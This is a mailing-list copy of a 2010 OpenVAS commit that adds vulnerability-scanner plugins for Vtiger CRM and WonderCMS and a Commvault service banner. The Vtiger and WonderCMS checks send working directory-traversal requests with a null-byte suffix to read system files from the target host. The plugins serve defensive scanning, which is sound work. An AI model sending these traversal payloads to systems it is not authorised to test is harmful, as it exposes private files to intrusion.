[Openvas-commits] r9440 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Thu Nov 18 13:10:52 CET 2010 

Author: mime
Date: 2010-11-18 13:10:44 +0100 (Thu, 18 Nov 2010)
New Revision: 9440

Added:
   trunk/openvas-plugins/scripts/gb_vtiger_crm_44901.nasl
   trunk/openvas-plugins/scripts/gb_vtiger_crm_detect.nasl
   trunk/openvas-plugins/scripts/gb_wondercms_44916.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/find_service2.nasl
Log:
Added new plugins. Added "Commvault Client Event Manager" banner, submitted by Brian Clark.

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2010-11-18 10:25:42 UTC (rev 9439)
+++ trunk/openvas-plugins/ChangeLog	2010-11-18 12:10:44 UTC (rev 9440)
@@ -1,3 +1,14 @@
+2010-11-18  Michael Meyer <michael.meyer at greenbone.net>
+
+	* scripts/gb_wondercms_44916.nasl,
+	scripts/gb_vtiger_crm_44901.nasl,
+	scripts/gb_vtiger_crm_detect.nasl:
+	Added new plugins.
+
+	* scripts/find_service2.nasl:
+	Added "Commvault Client Event Manager" banner, submitted by
+	Brian Clark.
+
 2010-11-18  Chandrashekhar B <bchandra at secpod.com>
 
 	* scripts/gb_google_chrome_mult_vuln_nov10_win.nasl,

Modified: trunk/openvas-plugins/scripts/find_service2.nasl
===================================================================
--- trunk/openvas-plugins/scripts/find_service2.nasl	2010-11-18 10:25:42 UTC (rev 9439)
+++ trunk/openvas-plugins/scripts/find_service2.nasl	2010-11-18 12:10:44 UTC (rev 9440)
@@ -121,6 +121,35 @@
 
 }
 
+# 0x00:  00 00 00 09 00 00 00 80 00 00 00 00 00 00 00 00    ................
+# 0x10:  00 00 04 32 00 00 00 01 00 00 09 5F 00 00 00 68    ...2......._...h
+# 0x20:  7A 29 57 2D 38 23 50 52 20 27 2E 57 35 5F 47 6A    z)W-8#PR '.W5_Gj
+# 0x30:  7D 25 39 65 37 2E 79 56 6E 67 4D 5E 4F 3E 3B 57    }%9e7.yVngM^O>;W
+# 0x40:  78 44 21 3A 32 32 27 7F 61 4A 31 65 59 3F 7A 75    xD!:22'.aJ1eY?zu
+# 0x50:  33 38 5D 43 40 30 55 74 7D 62 28 26 48 43 60 6C    38]C at 0Ut}b(&HC`l
+# 0x60:  51 70 5A 39 74 4A 42 40 47 7F 3F 39 2F 4B 2A 26    QpZ9tJB at G.?9/K*&
+# 0x70:  38 5F 25 36 65 20 6A 6A 44 33 61 37 25 78 56 2B    8_%6e jjD3a7%xV+
+# 0x80:  2D 54 4A 33 00 00 00 00                            -TJ3....
+# http://www.commvault.com/products-backup-recovery.html
+# # submitted by Brian Clark <bclark at Omeda.com> 17.11.10
+
+if(raw_string(
+0x00,0x00,0x00,0x09,0x00,0x00,0x00,0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+0x00,0x00,0x04,0x32,0x00,0x00,0x00,0x01,0x00,0x00,0x09,0x5F,0x00,0x00,0x00,0x68,
+0x7A,0x29,0x57,0x2D,0x38,0x23,0x50,0x52,0x20,0x27,0x2E,0x57,0x35,0x5F,0x47,0x6A,
+0x7D,0x25,0x39,0x65,0x37,0x2E,0x79,0x56,0x6E,0x67,0x4D,0x5E,0x4F,0x3E,0x3B,0x57,
+0x78,0x44,0x21,0x3A,0x32,0x32,0x27,0x7F,0x61,0x4A,0x31,0x65,0x59,0x3F,0x7A,0x75,
+0x33,0x38,0x5D,0x43,0x40,0x30,0x55,0x74,0x7D,0x62,0x28,0x26,0x48,0x43,0x60,0x6C,
+0x51,0x70,0x5A,0x39,0x74,0x4A,0x42,0x40,0x47,0x7F,0x3F,0x39,0x2F,0x4B,0x2A,0x26,
+0x38,0x5F,0x25,0x36,0x65,0x20,0x6A,0x6A,0x44,0x33,0x61,0x37,0x25,0x78,0x56,0x2B,
+0x2D,0x54,0x4A,0x33,0x00,0x00,0x00,0x00) >< buf && port == 8402) {
+
+  register_service(port:port, proto:"commvault_client_event_manager");
+  security_note(port:port, data:"The Commvault Client Event Manager service is running on this port");
+  exit(0);
+
+}
+
 # [root at f00dikator new_nasl_mods]# telnet 10.10.10.7 7110
 # Trying 10.10.10.7...
 # Connected to 10.10.10.7.

Added: trunk/openvas-plugins/scripts/gb_vtiger_crm_44901.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_vtiger_crm_44901.nasl	2010-11-18 10:25:42 UTC (rev 9439)
+++ trunk/openvas-plugins/scripts/gb_vtiger_crm_44901.nasl	2010-11-18 12:10:44 UTC (rev 9440)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Vtiger CRM Multiple Remote Security Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100910);
+ script_bugtraq_id(44901);
+ script_version ("1.0-$Revision$");
+
+ script_name("Vtiger CRM Multiple Remote Security Vulnerabilities");
+
+desc = "Overview:
+Vtiger CRM is prone to an arbitrary-file-upload vulnerability,
+multiple local file-include vulnerabilities, and multiple cross-site
+scripting vulnerabilities because the application fails to
+sufficiently sanitize user-supplied input.
+
+Attackers can exploit these issues to upload and execute arbitrary
+code in the context of the webserver process, view and execute
+arbitrary local files within the context of the webserver process,
+steal cookie-based authentication information, execute arbitrary client-
+side scripts in the context of the browser, and obtain sensitive
+information. Other attacks are also possible.
+
+Vtiger CRM 5.2.0 is vulnerable; other versions may also be affected.
+
+References:
+https://www.securityfocus.com/bid/44901
+http://www.vtiger.com/index.php
+http://www.ush.it/team/ush/hack-vtigercrm_520/vtigercrm_520.txt";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if Vtiger CRM is prone to a local file-include vulnerability");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("gb_vtiger_crm_detect.nasl","os_fingerprint.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+if(!dir = get_dir_from_kb(port:port,app:"vtiger_crm"))exit(0);
+
+os = get_kb_item("Host/OS/ICMP");
+files = traversal_files(os);
+
+foreach file (keys(files)) {
+   
+  url = string(dir, "/phprint.php?lang_crm=",crap(data:"../",length:3*9),files[file],"%00&module=a&action=a&activity_mode="); 
+
+  if(http_vuln_check(port:port, url:url,pattern:file)) {
+     
+    security_warning(port:port);
+    exit(0);
+
+  }
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_vtiger_crm_44901.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_vtiger_crm_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_vtiger_crm_detect.nasl	2010-11-18 10:25:42 UTC (rev 9439)
+++ trunk/openvas-plugins/scripts/gb_vtiger_crm_detect.nasl	2010-11-18 12:10:44 UTC (rev 9440)
@@ -0,0 +1,117 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# vtiger CRM Detection
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+# need desc here to modify it later in script.
+desc = "Overview:
+This host is running vtiger CRM, a web based, platform independant,
+modularly designed Open Source Customer Relationship Management
+(CRM) Software. 
+
+See also:
+http://www.vtiger.com";
+
+if (description)
+{
+ 
+ script_tag(name:"risk_factor", value:"None");
+ script_id(100909);
+ script_version ("1.0-$Revision$");
+
+ script_name("vtiger CRM Detection");
+ script_description(desc);
+ script_summary("Checks for the presence of vtiger CRM");
+ script_category(ACT_GATHER_INFO);
+ script_family("Service detection");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/vtigercrm",cgi_dirs());
+
+foreach dir (dirs) {
+
+ url = string(dir, "/index.php");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if("<title>vtiger CRM" >< buf && "login_language" >< buf)
+ {
+     if(strlen(dir)>0) {
+        install=dir;
+     } else {
+        install=string("/");
+     }
+
+    vers = string("unknown");
+    ### try to get version 
+    version = eregmatch(string: buf, pattern: "vtiger CRM ([0-9.]+)[^ ]",icase:TRUE);
+
+    if ( !isnull(version[1]) ) {
+       vers=chomp(version[1]);
+    }
+
+    set_kb_item(name: string("www/", port, "/vtiger_crm"), value: string(vers," under ",install));
+
+    if(vers == "unknown") {
+      set_kb_item(name:string("cpe:/a:vtiger:vtiger_crm"),value:TRUE);
+    } else {
+      set_kb_item(name:string("cpe:/a:vtiger:vtiger_crm:",vers),value:TRUE);
+    }  
+
+    info = string("com\n\nvtiger CRM Version '");
+    info += string(vers);
+    info += string("' was detected on the remote host in the following directory(s):\n\n");
+    info += string(install, "\n");
+
+    desc = ereg_replace(
+        string:desc,
+        pattern:"com$",
+        replace:info
+    );
+
+       if(report_verbosity > 0) {
+         security_note(port:port,data:desc);
+       }
+       exit(0);
+
+ }
+}
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_vtiger_crm_detect.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_wondercms_44916.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_wondercms_44916.nasl	2010-11-18 10:25:42 UTC (rev 9439)
+++ trunk/openvas-plugins/scripts/gb_wondercms_44916.nasl	2010-11-18 12:10:44 UTC (rev 9440)
@@ -0,0 +1,95 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# WonderCMS 'page' Parameter Cross Site Scripting And Information Disclosure Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100908);
+ script_bugtraq_id(44916);
+ script_version ("1.0-$Revision$");
+
+ script_name("WonderCMS 'page' Parameter Cross Site Scripting And Information Disclosure Vulnerabilities");
+
+desc = "Overview:
+WonderCMS is prone to a cross-site scripting vulnerability and an information-
+disclosure vulnerability because it fails to properly sanitize user-
+supplied input.
+
+An attacker may leverage these issues to obtain potentially sensitive
+information and to execute arbitrary script code in the browser of an
+unsuspecting user in the context of the affected site. This may allow
+the attacker to steal cookie-based authentication credentials and to
+launch other attacks.
+
+WonderCMS 0.3 is vulnerable; other versions may also be affected.
+
+Solution:
+Vendor patch is available. Please see the reference for more details.
+
+References:
+https://www.securityfocus.com/bid/44916
+http://krneky.com/en/wondercms";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if installed WonderCMS is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl","os_fingerprint.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+os = get_kb_item("Host/OS/ICMP");
+
+dirs = make_list("/cms","/wondercms",cgi_dirs());
+files = traversal_files(os);
+
+foreach dir (dirs) {
+  foreach file (keys(files)) {
+   
+    url = string(dir, "/index.php?page=",crap(data:"../",length:3*9),files[file],"%00"); 
+
+    if(http_vuln_check(port:port, url:url,pattern:file)) {
+     
+      security_warning(port:port);
+      exit(0);
+
+    }
+  }
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_wondercms_44916.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

More information about the Openvas-commits mailing list